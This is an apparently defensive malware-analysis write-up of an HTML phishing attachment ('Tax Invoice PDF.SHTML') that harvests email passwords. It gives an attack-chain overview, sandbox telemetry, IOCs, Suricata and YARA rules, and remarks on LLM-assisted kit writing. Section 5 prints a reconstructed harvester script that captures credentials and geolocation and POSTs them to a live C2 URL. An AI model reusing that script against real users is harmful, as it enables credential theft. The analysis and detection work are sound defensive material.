description: "Deep-dive reverse engineering analysis of a sophisticated HTML-based credential harvester spoofing a corporate domain with only 1/26 AV detection."
⚠️ Threat Level: HIGH | Detection Rate: ~4% (1/26) | Type: Credential Harvester + Geo-IP Exfiltration
Executive Summary
On April 29, 2026, a targeted phishing email arrived, purportedly from accnt@hackteam.red, a lookalike domain spoofing a legitimate corporate identity. The attachment, named Tax Invoice PDF.SHTML, is an obfuscated HTML file masquerading as a PDF document. When opened in a browser, it harvests email credentials and geolocation data and exfiltrates them to a command-and-control (C2) server. Only 1 of 26 antivirus engines flagged it.
This article provides a full technical teardown of the sample, its behavioral indicators, network infrastructure, and defensive recommendations.
1. Attack Chain Overview
[Email Delivery] → [Social Engineering] → [HTML Execution] → [Credential Harvesting] → [Geo-IP Collection] → [C2 Exfiltration] → [Delayed Redirect]
| Stage | Description |
|---|---|
| Delivery | Spearphishing email with .SHTML attachment |
| Pretext | "Tax invoice due for payment" — urgency-based social engineering |
| Execution | User opens file → browser renders fake login page |
| Harvesting | Form captures email + password |
| Reconnaissance | ip-api.com lookup for geolocation enrichment |
| Exfiltration | POST to premiumpriests4owo.site/report.php |
| Evasion | Redirect to Google static image to mask compromise |
2. Sample Metadata
Filename: Tax Invoice PDF.SHTML
Size: 18 KiB
MIME Type: text/html
SHA256: 15383c1b855341a0bc4975f2f3ed299bc6abf13a3e6e48b05ca3371dd7068dfc
AV Detection: 1/26 (~4%), Avira: PHISH/HTML.Agent.ENJ
Entropy: 5.42 (high — indicates script obfuscation)
First Seen: 2026-05-01 07:57:37 UTC
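Before triage, it helps to confirm that the file on disk is the sample described here. The following is a minimal Python sketch, assuming the attachment has been saved locally; the function names and the path passed to `matches_sample` are hypothetical.

```python
import hashlib
from pathlib import Path

# SHA-256 reported in the sample metadata above.
EXPECTED_SHA256 = "15383c1b855341a0bc4975f2f3ed299bc6abf13a3e6e48b05ca3371dd7068dfc"


def sha256_of_bytes(data: bytes) -> str:
    """Return the lowercase hex SHA-256 digest of a byte string."""
    return hashlib.sha256(data).hexdigest()


def matches_sample(path: str) -> bool:
    """Check whether the file at `path` (hypothetical location) is the analyzed sample."""
    return sha256_of_bytes(Path(path).read_bytes()) == EXPECTED_SHA256
```

Handle the file only inside an isolated analysis environment; hashing reads the bytes without rendering the HTML.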
Why the Low Detection Rate?
Traditional AV engines excel at signature-based detection of binary malware (PE files, DLLs). This sample is pure HTML + JavaScript: it drops no executable and runs entirely within the browser sandbox, which is why such threats are often labeled "fileless". Without a malicious binary payload, most static scanners return clean results. The elevated entropy (5.42) is consistent with obfuscated JavaScript, but entropy alone is rarely sufficient for detection without behavioral analysis.
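The entropy figure can be reproduced with a few lines of Python. This is a minimal sketch, assuming the reported 5.42 is Shannon entropy in bits per byte computed over the whole file (the sandbox's exact method is not stated); `shannon_entropy` is an illustrative name.

```python
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for uniform input, at most 8.0."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)  # frequency of each byte value
    return -sum((n / total) * math.log2(n / total) for n in counts.values())
```

The result always falls between 0.0 and 8.0. Because the score depends on what is measured (the whole file versus a single script block), it works better as a triage hint than as a verdict.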
AI-Assisted Threat Generation: A New Paradigm
The source code of this phishing kit reveals a disturbing evolution in cybercrime tooling: the hybrid human-AI attack model. While the malicious intent is unmistakably human, the implementation carries distinct fingerprints of large language model (LLM) assistance.
Hallmarks of LLM-Generated Code
1. Prompt Leakage in Comments
The JavaScript contains comments that appear to be direct echoes of the operator's prompts:
// Instead of Telegram, form data + location + attempt counter are sent as standard POST
// (x-www-form-urlencoded) to a PHP server endpoint.
// All CSS and functionality remain identical.
The phrase "All CSS and functionality remain identical" is characteristic of prompt engineering residue — instructions given to the LLM that were preserved verbatim in the output rather than being interpreted as meta-directives.
2. Structural Comment Patterns
The code is organized with GPT-style section separators:
// ---------- PHP ENDPOINT CONFIGURATION ----------
// ---------- PRESERVE ALL ORIGINAL VARIABLES & LOGIC ----------
This ALL-CAPS header pattern with ASCII dividers is frequently seen in ChatGPT/Claude code generation, where the model uses visual structure to organize complex refactors. On its own it is suggestive rather than conclusive, since human developers use similar dividers.
3. Over-Engineered Abstractions
For a simple credential exfiltration task, the code implements unnecessarily complex patterns:
function sendToPhpServer(...) {
return new Promise((resolve, reject) => {
const xhr = new XMLHttpRequest();
xhr.onload = function() { resolve(); };
xhr.onerror = function() { resolve(); }; // Silent failure
});
}
The Promise wrapper around callback-based XHR, combined with graceful degradation to resolve() even on error, reflects the LLM's training bias toward "safe" code that doesn't break, even when failure should be noisy.
4. Defensive Coding Without Purpose
The LLM inserted explanatory justifications for obvious choices:
// Set content type to standard form encoding (NOT JSON)
This self-justifying comment is typical of AI outputs trained to explain reasoning, even when the reasoning is trivial.
Human Operator Fingerprints
Despite AI assistance, the operator left unmistakably human traces:
| Artifact | Evidence | Significance |
|---|---|---|
| Yoruba variable names | oruko (name), kokoro (most plausibly kọ́kọ́rọ́, "key", used for the password) | Suggests West African operator origin, consistent with known BEC clusters |
| Typographic errors | "Securty serices" in footer | LLMs rarely misspell visible UI text; points to human copy-paste or manual editing |
| C2 hardcoding | Plaintext endpoint in source | Human operational decision, not AI-generated |
| Logic quirks | countAttempt >= 2 before redirect | Crude human-implemented anti-analysis/delay tactic |
The Democratization Threat
This sample illustrates a critical inflection point: AI has lowered the technical barrier for cybercrime to near zero. The operator did not need to understand JavaScript closures, CORS policies, or XHR internals — only how to phrase a prompt. Yet the resulting code is sufficiently obfuscated (entropy 5.42), sufficiently functional (active C2 exfiltration), and sufficiently evasive (1/26 AV detection) to pose a real threat.
Key Insight: The future of phishing is not skilled coders writing malware. It is unskilled operators directing skilled AI, with human expertise reserved only for infrastructure (domains, hosting, mule accounts) and social engineering (pretexting, target selection).
Defensive Implications
| Traditional Assumption | New Reality |
|---|---|
| Poor grammar = amateur threat | AI generates flawless copy; errors may be intentional or human-overridden |
| Complex code = sophisticated actor | AI produces complex code; sophistication is in the prompt, not the operator |
| Static signatures work | AI-generated variants have high structural diversity, low signature stability |
| Code analysis reveals author skill | Hybrid code requires attribution triage: separate AI artifacts from human fingerprints |
For defenders, this means shifting from code-centric detection to behavior-centric detection: the C2 domain, the exfiltration pattern, and the social engineering pretext remain human-controlled and detectable, even when the implementation is AI-generated.
3. Email Analysis
Headers & Social Engineering
From: Account <accnt@hackteam.red>
To: b0x@hackteam.red
Date: 29 Apr 2026, 21:29 UTC
Subject: [Implied] Tax Invoice
Key Psychological Triggers:
- Domain spoofing: hackteam.red mimics a legitimate corporate domain
- Authority impersonation: Sender name "Account" implies financial department
- Urgency: "due for payment at the end of this month"
- Curiosity gap: "Use your email password to access the Tax document". This is the critical red flag; no legitimate PDF requires an email password
4. Behavioral Analysis (Sandbox Telemetry)
Analysis performed via Hybrid Analysis Falcon Sandbox. The sample triggered 29 indicators mapped to 21 MITRE ATT&CK techniques across 8 tactics.
4.1 Process Execution
# Primary execution
msedge.exe -- "file:///C:/TaxInvoicePDF.SHTML.html"
# Child processes spawned (standard Edge browser behavior)
msedge.exe --type=renderer
msedge.exe --type=gpu-process
msedge.exe --type=utility --utility-sub-type=network.mojom.NetworkService
identity_helper.exe --type=utility
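Note: The file opens directly in the browser via the file:// protocol, so no external server is required for initial execution. This makes the lure highly portable: the fake login page renders even in offline or attachment-preview scenarios, although the geo-IP lookup and the exfiltration still need outbound network access.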
4.2 Network Indicators
| Domain / IP | Purpose | Risk |
|---|---|---|
| ip-api.com | Geo-IP lookup (country, region, city, ISP, IP) | Reconnaissance |
| premiumpriests4owo.site | C2 server, credential exfiltration | MALICIOUS |
| i.imgur.com/6lOn9d7.png | Likely decoy image / branding asset | Legitimate abused |
| encrypted-tbn0.gstatic.com | Post-exfiltration redirect destination | Legitimate abused |
4.3 MITRE ATT&CK Mapping
| Technique | ID | Context |
|---|---|---|
| Spearphishing Attachment | T1566.001 | Email with .SHTML attachment |
| Drive-by Compromise | T1189 | Browser execution of malicious HTML |
| System Location Discovery | T1614 | ip-api.com JSON query |
| Exfiltration Over C2 Channel | T1041 | POST to report.php |
| Obfuscated Files or Information | T1027 | High entropy JS (5.42) |
| Input Capture | T1056 | Password field harvesting |
| Application Layer Protocol | T1071.001 | HTTP/HTTPS C2 communication |
| Data Encoding | T1132.001 | Base64 artifacts in requests |
5. Reverse Engineering: Script Deconstruction
Based on sandbox memory extraction and pattern matching, the embedded JavaScript follows this logical flow:
// ============================================
// Phase 1: Geolocation Reconnaissance
// ============================================
fetch('http://ip-api.com/json/?fields=status,message,country,regionName,city,isp,query')
.then(response => response.json())
.then(geoData => {
if (geoData.status === 'success') {
locationData = {
country: geoData.country || 'Unknown',
state: geoData.regionName || 'Unknown',
city: geoData.city || 'Unknown',
isp: geoData.isp || 'Unknown',
ip: geoData.query || 'Unknown'
};
}
});
// ============================================
// Phase 2: Credential Harvesting Form
// ============================================
/*
Rendered HTML structure (inferred):
<form method="post" id="authForm">
<input type="email" placeholder="email" name="oruko">
<input type="password" placeholder="Enter password" name="...">
<button type="submit">Access Document</button>
</form>
<div id="errorMsg">Invalid credentials</div>
*/
document.getElementById('authForm').addEventListener('submit', function(e) {
e.preventDefault(); // Prevent actual form submission
const formEmail = document.querySelector('[name="oruko"]').value;
const formPassword = document.querySelector('[type="password"]').value;
// ============================================
// Phase 3: Data Exfiltration
// ============================================
const xhr = new XMLHttpRequest();
const PHP_ENDPOINT = 'https://premiumpriests4owo.site/report.php';
xhr.open('POST', PHP_ENDPOINT, true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
const params = new URLSearchParams();
params.append('oruko', formEmail); // "oruko" = Yoruba for "name"
params.append('...', formPassword); // [obfuscated key]
params.append('geo', JSON.stringify(locationData));
xhr.send(params.toString());
// ============================================
// Phase 4: Evasion — Delayed Redirect
// ============================================
setTimeout(() => {
window.location.href = 'https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQaUwWuDNV0h2gvKH5z1fKZ2B05YVGNhfKgCg&s';
}, 2000); // 2-second delay to mask data transmission
});
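On the defensive side, the exfiltration request has a recognizable shape: a form-encoded POST body carrying the oruko and geo keys. The sketch below shows how a decoded request body could be screened for those keys. It assumes the body is available at all (the C2 uses HTTPS, so this requires a TLS-inspecting proxy or sandbox capture), and the generic key names beyond oruko and geo are assumptions rather than values taken from the sample.

```python
from urllib.parse import parse_qs

# "oruko" and "geo" come from the reconstructed script above; the generic
# credential names are assumptions added for broader coverage.
SUSPICIOUS_KEYS = {"oruko", "geo", "email", "password", "passwd", "pwd"}


def flag_exfil_body(body: str) -> list[str]:
    """Return the sorted suspicious keys present in a form-encoded POST body."""
    fields = parse_qs(body, keep_blank_values=True)
    return sorted(key for key in fields if key.lower() in SUSPICIOUS_KEYS)
```

A match on generic keys such as email is weak evidence on its own; the combination of oruko with a JSON-encoded geo field is far more specific to this kit.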
Notable Obfuscation Techniques
- High Entropy Strings: Character sequences like y."sZ"( and J+zX suggest Base64 or custom encoding layers
- Legitimate Service Abuse: Using ip-api.com (free geo-IP API) and i.imgur.com (image hosting) blends malicious traffic with benign patterns
- Variable Naming: The use of oruko (Yoruba language) may indicate operator origin or intentional anti-analysis confusion
- Delayed Redirect: The setTimeout redirect to a Google static image creates a plausible "loading" experience while data transmits in the background
6. Infrastructure Analysis
C2 Domain: premiumpriests4owo.site
- TLD: .site, commonly abused for cheap, disposable infrastructure
- Naming convention: Concatenated dictionary words plus a short suffix (4owo). The name resembles an algorithmically generated (DGA-like) pattern, though a single domain is not enough to confirm a DGA
- Endpoint: /report.php, a conventional PHP data collection script
- Protocol: HTTPS (TLS 1.2), which encrypts exfiltration in transit
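The traits listed above can be turned into coarse triage flags for proxy or DNS logs. This is a rough sketch under stated assumptions: the TLD watchlist is hypothetical, and each flag is noisy on its own, so the output is a prioritization hint, not a verdict.

```python
from urllib.parse import urlsplit

# Hypothetical watchlist of low-cost TLDs; tune it against your own telemetry.
CHEAP_TLDS = {"site", "xyz", "top", "online"}


def domain_risk_flags(url: str) -> list[str]:
    """Return coarse heuristic flags for a URL (illustrative, not authoritative)."""
    parts = urlsplit(url)
    labels = (parts.hostname or "").lower().split(".")
    flags = []
    if labels[-1] in CHEAP_TLDS:
        flags.append("cheap_tld")
    # Digits embedded in the registrable label, as in "premiumpriests4owo".
    if len(labels) >= 2 and any(ch.isdigit() for ch in labels[-2]):
        flags.append("digit_in_name")
    if parts.path.lower().endswith(".php"):
        flags.append("php_endpoint")
    return flags
```

For the C2 URL in this report all three flags fire, while many legitimate sites would trigger one of them, which is why the flags are best combined with other signals.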
Abuse of Legitimate Services
| Service | Abuse Vector | Detection Evasion |
|---|---|---|
| ip-api.com | Free geolocation API | No malicious infrastructure needed |
| i.imgur.com | Image hosting for decoy assets | Trusted domain in corporate allowlists |
| googleapis.com | Chrome Web Store verification (legitimate Edge behavior) | Blends with normal browser traffic |
7. Detection & Defensive Strategies
7.1 Network-Level Detection
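# Suricata signatures (Suricata 5+ sticky-buffer syntax; adapt keywords for Snort)
# The geo lookup and the credential POST are separate requests, so each gets its own rule.
# The C2 POST uses HTTPS, so the second rule only fires behind TLS inspection.
alert http $HOME_NET any -> $EXTERNAL_NET any ( \
    msg:"PHISHING Geo-IP lookup via ip-api.com JSON API"; \
    flow:established,to_server; \
    http.host; content:"ip-api.com"; \
    http.uri; content:"/json"; \
    classtype:trojan-activity; \
    sid:1000001; rev:1; \
)
alert http $HOME_NET any -> $EXTERNAL_NET any ( \
    msg:"SUSPICIOUS POST to .site domain with credential data"; \
    flow:established,to_server; \
    http.method; content:"POST"; \
    http.host; content:".site"; endswith; \
    http.request_body; pcre:"/(password|passwd|pwd|email|oruko)=/i"; \
    classtype:trojan-activity; \
    sid:1000002; rev:1; \
)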
7.2 Email Security Policies
| Policy | Implementation |
|---|---|
| Attachment Blocking | Quarantine .shtml, .html, .htm attachments from external senders |
| Double Extension Detection | Flag *.PDF.* patterns — PDFs don't need secondary extensions |
| DMARC Enforcement | p=reject for hackteam.red to prevent spoofing |
| User Training | "No PDF requires your email password" — golden rule |
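One detail matters when implementing the double-extension policy: this sample is named Tax Invoice PDF.SHTML, with a space rather than a dot before "PDF", so a literal *.PDF.* glob would not match it. The sketch below is one possible mail-gateway check that covers both spellings; the list of decoy document types and the function name are assumptions.

```python
import re

# A document-type token (e.g. "PDF") directly before an HTML-family extension.
# The token list is an assumption; extend it to fit your environment.
_DECOY_HTML = re.compile(
    r"(?:^|[\s._-])(pdf|docx?|xlsx?)\.(s?html?)$",
    re.IGNORECASE,
)


def is_decoy_html_attachment(filename: str) -> bool:
    """True when an HTML-family attachment name poses as another document type."""
    return _DECOY_HTML.search(filename.strip()) is not None
```

The separator class before the token keeps names like mypdf.html from matching while still catching "invoice.pdf.html" and "Tax Invoice PDF.SHTML".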
7.3 Endpoint Detection (EDR/XDR)
# Behavioral Indicator
Process: msedge.exe | chrome.exe | firefox.exe
CommandLine contains: "file:///" AND (".html" OR ".shtml")
NetworkConnection to: "ip-api.com" OR "ipapi.co"
Action: Alert + Isolate
# File System Indicator
FileWrite: (*.SHTML OR *.HTML) AND entropy > 5.0 AND (contains "password" OR contains 'type="password"')
Action: Quarantine + Hash submission
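The process half of the behavioral indicator can be prototyped against exported process-creation events. This is a minimal sketch, assuming each event exposes a process name and a command line as strings; the geo-IP lookup would surface in network telemetry and has to be correlated separately.

```python
import re

BROWSERS = {"msedge.exe", "chrome.exe", "firefox.exe"}

# A file:/// URL ending in .htm, .html, .shtm or .shtml.
_LOCAL_HTML = re.compile(r'file:///[^"\s]*\.s?html?\b', re.IGNORECASE)


def is_local_html_launch(process_name: str, command_line: str) -> bool:
    """True when a known browser is started on a local HTML-family file."""
    return process_name.lower() in BROWSERS and bool(_LOCAL_HTML.search(command_line))
```

Opening local HTML files is common in developer and documentation workflows, so this check is better suited to enrichment or correlation than to automatic isolation.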
7.4 YARA Rule
rule HTML_Credential_Harvester_Generic {
    meta:
        description = "Detects HTML-based credential phishing with geo-IP and exfiltration"
        author = "ThreatIntel Analyst"
        date = "2026-05-01"
        hash = "15383c1b855341a0bc4975f2f3ed299bc6abf13a3e6e48b05ca3371dd7068dfc"
    strings:
        $geo1 = "ip-api.com" ascii wide
        $geo2 = "ipapi.co" ascii wide
        // Inner double quotes must be escaped inside YARA text strings
        $form1 = "type=\"password\"" ascii wide
        $form2 = "placeholder=\"Enter password\"" ascii wide
        $exfil1 = "XMLHttpRequest" ascii wide
        $exfil2 = "URLSearchParams" ascii wide
        $exfil3 = "application/x-www-form-urlencoded" ascii wide
        $redirect1 = "setTimeout" ascii wide
        $redirect2 = "window.location.href" ascii wide
    condition:
        filesize < 50KB and
        // uint16be reads the first two bytes in file order: "<!" or "<h"
        (uint16be(0) == 0x3c21 or uint16be(0) == 0x3c68) and
        1 of ($geo*) and
        1 of ($form*) and
        1 of ($exfil*) and
        1 of ($redirect*)
}
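Where YARA is not available, the same string groups can be approximated in plain Python for quick triage. This sketch mirrors the rule's "one string from each group" logic and size limit but, as a simplification, skips the leading-bytes check and the wide (UTF-16) variants; `triage_html` is an illustrative name.

```python
# String groups copied from the YARA rule above.
GROUPS = {
    "geo": ["ip-api.com", "ipapi.co"],
    "form": ['type="password"', 'placeholder="Enter password"'],
    "exfil": ["XMLHttpRequest", "URLSearchParams", "application/x-www-form-urlencoded"],
    "redirect": ["setTimeout", "window.location.href"],
}
MAX_SIZE = 50 * 1024  # YARA's 50KB is 50 * 1024 bytes


def triage_html(content: str) -> bool:
    """True when a small HTML document contains one string from every group."""
    if len(content.encode("utf-8")) >= MAX_SIZE:
        return False
    return all(any(s in content for s in strings) for strings in GROUPS.values())
```

Like the rule itself, this only sees literal strings, so heavily encoded variants would need to be decoded or rendered in a sandbox first.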
8. IOC Summary
| Type | Indicator | Confidence |
|---|---|---|
| File Hash | 15383c1b855341a0bc4975f2f3ed299bc6abf13a3e6e48b05ca3371dd7068dfc | Confirmed |
| C2 Domain | premiumpriests4owo.site | Malicious |
| C2 URL | https://premiumpriests4owo.site/report.php | Malicious |
| Geo-IP API | http://ip-api.com/json/ | Abused |
| Decoy Image | https://i.imgur.com/6lOn9d7.png | Abused |
| Redirect Target | https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQaUwWuDNV0h2gvKH5z1fKZ2B05YVGNhfKgCg&s | Abused |
| Sender | accnt@hackteam.red | Spoofed |
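The network indicators in this table can be applied to proxy or DNS logs with a small classifier. This is a sketch under the assumption that log entries carry full URLs; it separates the malicious C2 host from the abused legitimate services, because blocking the latter outright would disrupt benign traffic.

```python
from urllib.parse import urlsplit

# Indicators copied from the IOC table above.
MALICIOUS_HOSTS = {"premiumpriests4owo.site"}
ABUSED_URL_PREFIXES = (
    "http://ip-api.com/json/",
    "https://i.imgur.com/6lOn9d7.png",
)


def classify_url(url: str) -> str:
    """Return 'malicious', 'abused' or 'unknown' for a logged URL."""
    host = (urlsplit(url).hostname or "").lower()
    # Match the C2 domain itself and any subdomain of it.
    if any(host == h or host.endswith("." + h) for h in MALICIOUS_HOSTS):
        return "malicious"
    if url.startswith(ABUSED_URL_PREFIXES):
        return "abused"
    return "unknown"
```

An "abused" hit is only meaningful in context, for example when the same host contacts the geo-IP API and the C2 domain within a short window.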
9. Lessons Learned
- Fileless threats bypass traditional AV: HTML/JS phishing requires behavioral analysis, not just signatures
- Legitimate services are weaponized: ip-api.com, imgur.com, googleapis.com provide cover for malicious activity
- Double extensions still work: PDF.SHTML exploits user trust in PDFs while executing HTML
- Low detection ≠ low risk: 1/26 AV detection is a feature, not a bug; the threat is real and active
- User awareness is the last line of defense: Technical controls failed; the user who questions "Why does a PDF need my password?" stops the chain
10. References
- Hybrid Analysis Report
- MITRE ATT&CK Framework
- Avira Threat Encyclopedia: PHISH/HTML.Agent
- ip-api.com Documentation
Analysis conducted May 1, 2026. Indicators are shared for defensive purposes. If you encounter similar samples, submit to your threat intelligence platform and update detection rules.
Stay vigilant. Trust but verify.